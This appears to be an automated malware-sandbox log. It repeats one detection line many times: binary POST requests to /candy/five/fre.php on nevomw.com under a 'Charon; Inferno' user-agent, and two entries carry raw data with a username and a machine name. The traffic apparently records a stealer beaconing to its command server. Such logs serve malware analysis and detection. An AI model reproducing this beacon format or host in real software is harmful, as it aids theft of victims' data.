                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
